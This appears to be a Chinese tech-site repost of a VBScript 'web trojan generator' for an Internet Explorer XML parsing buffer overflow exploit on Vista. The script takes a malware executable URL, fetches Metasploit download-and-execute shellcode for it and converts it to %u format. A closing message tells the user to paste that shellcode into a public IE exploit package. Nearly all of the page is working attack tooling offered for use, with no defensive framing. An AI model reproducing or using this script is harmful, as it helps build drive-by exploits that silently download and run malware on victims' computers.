当前位置: 移动技术网 > IT编程>脚本编程>VBScript > 网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

2017年12月08日  | 移动技术网IT编程  | 我要评论
'code by lcx

on error resume next
exeurl = inputbox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )
url="http://www.metasploit.com:55555/payloads?parent=glob%280x25bfa38%29&module=win32_downloadexec&mode=generate&opt_url="&urlencoding(exeurl)&"&maxsize=&badchars=0x00+&encoder=default&action=generate+payload"


body = gethttppage(url)
set re = new regexp
re.pattern = "(\$shellcode \=[\s\s]+</div></pre>)"

set matches = re.execute(body)
if matches.count>0 then body = matches(0).value

code=trim(replace(replace(replace(replace(replace(replace(replace(body,"$shellcode =",""),chr(34),""),chr(13),""),";",""),"</div></pre>",""),chr(10),""),".",""))

function replaceregex(str)
set regex=new regexp
regex.pattern="\\x(..)\\x(..)"
regex.ignorecase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end function


function gethttppage(path)
t = getbody(path)
gethttppage = bytestobstr(t, "gb2312")
end function

function getbody(url)
on error resume next
set retrieval = createobject("microsoft.xmlhttp")
with retrieval
.open "get", url, false, "", ""
.send
getbody = .responsebody
end with
set retrieval = nothing
end function

function bytestobstr(body, cset)
dim objstream
set objstream = createobject("adodb.stream")
objstream.type = 1
objstream.mode = 3
objstream.open
objstream.write body
objstream.position = 0
objstream.type = 2
objstream.charset = cset
bytestobstr = objstream.readtext
objstream.close
set objstream = nothing
end function

function urlencoding(vstrin)
strreturn = ""
for aaaa = 1 to len(vstrin)
thischr = mid(vstrin,aaaa,1)
if abs(asc(thischr)) < &hff then
strreturn = strreturn & thischr
else
innercode = asc(thischr)
if innercode < 0 then
innercode = innercode + &h10000
end if
hight8 = (innercode and &hff00)\ &hff
low8 = innercode and &hff
strreturn = strreturn & "%" & hex(hight8) & "%" & hex(low8)
end if
next
urlencoding = strreturn
end function

set fso=createobject("scripting.filesystemobject")
set files=fso.opentextfile("a.txt",2,true)
files.writeline replaceregex(code)
'files.writeline body
wscript.echo replaceregex(code)
files.close
set fso=nothing

wscript.echo chr(13)&"ok,生成a.txt,请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1内容即可"

您可能感兴趣的文章:

如对本文有疑问, 点击进行留言回复!!

相关文章:

验证码:
最近更新的文章
大家感兴趣的文章
移动技术网